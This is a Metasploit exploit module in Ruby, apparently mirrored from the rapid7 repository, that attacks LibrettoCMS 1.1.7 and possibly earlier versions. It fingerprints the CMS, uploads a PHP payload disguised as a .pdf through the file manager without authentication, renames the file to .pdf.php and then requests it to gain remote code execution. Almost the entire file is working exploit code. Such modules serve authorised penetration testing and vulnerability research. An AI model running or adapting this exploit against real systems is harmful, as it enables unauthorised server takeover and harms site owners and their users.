Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/libretto_upload_exec.rb
24992 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::PhpEXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "LibrettoCMS File Manager Arbitary File Upload Vulnerability",

17
        'Description' => %q{

18
          This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and

19
          possibly prior.  Attackers can bypass the file extension check and abuse the upload

20
          feature in order to upload a malicious PHP file without authentication, which

21
          results in arbitrary remote code execution.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'CWH',

26
          'sinn3r' # Metasploit

27
        ],

28
        'References' => [

29
          ['CVE', '2013-10054'],

30
          ['OSVDB', '94391'],

31
          ['EDB', '26213']

32
        ],

33
        'Payload' => {

34
          'BadChars' => "\x00"

35
        },

36
        'Platform' => %w{linux php},

37
        'Targets' => [

38
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],

39
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]

40
        ],

41
        'Privileged' => false,

42
        'DisclosureDate' => '2013-06-14',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/'])

55
      ]

56
    )

57
  end

58


59
  def check

60
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) })

61
    if not res

62
      vprint_error("Connection timed out")

63
      return Exploit::CheckCode::Unknown

64
    end

65


66
    if res.body =~ /Powered by <a href=".+">Libretto CMS/

67
      return Exploit::CheckCode::Detected

68
    end

69


70
    Exploit::CheckCode::Safe

71
  end

72


73
  def upload(base)

74
    p = get_write_exec_payload(:unlink_self => true)

75
    fname = "#{Rex::Text.rand_text_alpha(6)}.pdf"

76


77
    data = Rex::MIME::Message.new

78
    data.add_part(fname, nil, nil, "form-data; name=\"Filename\"")

79
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"")

80
    data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"')

81
    post_data = data.to_s

82


83
    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php')

84


85
    res = send_request_cgi({

86
      'method' => 'POST',

87
      'uri' => uri,

88
      'ctype' => "multipart/form-data; boundary=#{data.bound}",

89
      'data' => post_data,

90
      'vars_get' => { 'type' => 'all files' }

91
    })

92


93
    if not res

94
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")

95
    elsif res.code.to_i != 200

96
      fail_with(Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}")

97
    end

98


99
    fname

100
  end

101


102
  def rename(base, original_fname)

103
    new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php"

104
    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php')

105
    res = send_request_cgi({

106
      'method' => 'POST',

107
      'uri' => uri,

108
      'vars_get' => { 'type' => 'all files' },

109
      'vars_post' => {

110
        'fun' => 'renameFile',

111
        'dir' => '',

112
        'filename' => original_fname,

113
        'newFilename' => new_name

114
      }

115
    })

116


117
    if not res

118
      fail_with(Failure::Unknown, "#{peer} - Request timed out while renaming")

119
    elsif res.body !~ /"res":"OK"/

120
      fail_with(Failure::Unknown, "#{peer} - Failed to rename file")

121
    end

122


123
    new_name

124
  end

125


126
  def exec(base, payload_fname)

127
    res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) })

128
    if res and res.code.to_i == 404

129
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")

130
    end

131
  end

132


133
  def exploit

134
    base = target_uri.path

135


136
    print_status("Uploading malicious file...")

137
    orig_fname = upload(base)

138


139
    print_status("Renaming #{orig_fname}...")

140
    new_fname = rename(base, orig_fname)

141


142
    print_status("Executing #{new_fname}...")

143
    exec(base, new_fname)

144
  end

145
end

146


147